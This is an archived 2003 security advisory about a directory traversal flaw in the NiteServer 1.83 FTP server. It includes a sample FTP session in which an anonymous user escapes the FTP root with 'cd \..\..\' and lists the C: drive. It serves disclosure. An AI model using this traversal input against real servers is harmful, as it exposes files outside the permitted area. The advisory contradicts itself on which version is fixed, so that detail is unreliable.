Vulnwatch mailing list archives

Previous By Date Next
Previous By Thread Next

Directory traversal vulnerabilities found in NITE ftp-server version 1.83

From: matrix () infowarfare dk
Date: Wed, 15 Jan 2003 13:10:46 +0100
                 Directory traversal vulnerabilities found in 
                        NITE ftp-server version 1.83
                                                         
                           Discovered by Dennis Rand
                            www.Infowarfare.dk
------------------------------------------------------------------------


SUMMARY

The NiteServer is a simple FTP-Server program with some special features.
It is free and easy to use.
The following commands are recognized :
USER PORT RETR REST
PASS STOR CWD DELE 
HELP LIST
so it should work with any usual ftp-client.
Special Download-Ratio features are implemented.
User-logins are logged with their IP-Number, so the Up/Download-Ratio
will be held for the future. Spy users, watch what they are up- or downloading.
Are you interested in learning Visual Basic Internet programming ? 
Do you need some different features ?
You can purchase the source-code (VB 6.0) from the Author.
Simply send a check about 25 US-$ to

A directory traversal vulnerability in the product allows remote attackers to 
cause 
the server to traverse into directories that reside outside the bounding 
FTP root directory.

DETAILS

Vulnerable systems:
 Windows NT 4.0 and Windows 2000 server fully patched
 *  Niteserver Version:1.83 - Author:Thomas Krebs
 
Immune systems:
 * NiteServer version 1.85

NiteServer failure to filter out "\.." sequences in command requests allows 
remote users to break out of restricted directories and gain read access 
to the system directory structure; Possibility for discovering the directory
structure outside the configured areas. 


The following transcript demonstrates a sample exploitation of the 
vulnerabilities:

Connected to 192.168.1.22.
220-  Niteserver Version:1.83
220-  Author:Thomas Krebs
220-  email: turtie () knuut de
220- Welcome to the  Niteserver
220- First Author:Thomas Krebs!
220-
220
User (192.168.1.22:(none)): anonymous
331 User anonymous accepted, send password.....
Password:
230 User anonymous accepted, ok come on.....
ftp> ls
200 PORT command ok....
257 "c:/ftpd/data" is working directory...c:\ftpd\data
ftp> cd /
250 Directory changed to"c:\ftpd\data" .
ftp> cd ..
250 Directory changed to"c:\ftpd\data" .
ftp> cd \..\..\
250 Directory changed to"c:\" .
ftp> ls
200 PORT command ok....
257 "c:/" is working directory...c:\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 AUTOEXEC.BAT
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 CONFIG.SYS
drwxr-xr-x  1 User     Group              0 Dec 23 12:25 I386
drwxr-xr-x  1 User     Group              0 Dec 23 22:22 Inetpub
drwxr-xr-x  1 User     Group              0 Dec 23 21:49 Installationsfiler 
til Windows Update
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 IO.SYS
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 MSDOS.SYS
drwxr-xr-x  1 User     Group              0 Dec 23 21:25 Multimedia Files
-rwxr-xr-x  1 User     Group          26816 Dec 23 22:30 NTDETECT.COM
-rwxr-xr-x  1 User     Group         156496 Dec 23 22:30 ntldr
drwxr-xr-x  1 User     Group              0 Dec 23 12:36 OptionPack
-rwxr-xr-x  1 User     Group      134217728 Dec 30 15:24 pagefile.sys
drwxr-xr-x  1 User     Group              0 Dec 30 15:19 Program Files
drwxr-xr-x  1 User     Group              0 Dec 23 12:24 RECYCLER
drwxr-xr-x  1 User     Group              0 Dec 24 00:08 TEMP
drwxr-xr-x  1 User     Group              0 Dec 30 16:30 WINNT
226 Listing complete.
ftp: 1181 bytes received in 0,12Seconds 9,76Kbytes/sec.
ftp> bye
221 Goodbye.

Detection:
Niteserver Version:1.83 is vulnerable to the above-described attacks. 
Earlier versions may be susceptible as well. To determine if a specific 
implementation is vulnerable, experiment by following the above 
transcript. 

Vendor response:
Niteserver Version:1.83 fixes this issue. The latest version is 
available from  come.to/niteserversite


Disclosure timeline:
12/12/2002 Found the Vulnerability.
12/12/2002 Author notified (turtie () knuut de)
01/13/2003 No Responses received from turtie () knuut de
01/13/2003 Public Disclosure.


ADDITIONAL INFORMATION
The vulnerability was discovered by <mailto:matrix () infowarfare dk> Dennis Rand

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages. 




-------------------------------------------------
This mail sent through IMP: http://horde.org/imp/
Previous By Date Next
Previous By Thread Next

Current thread: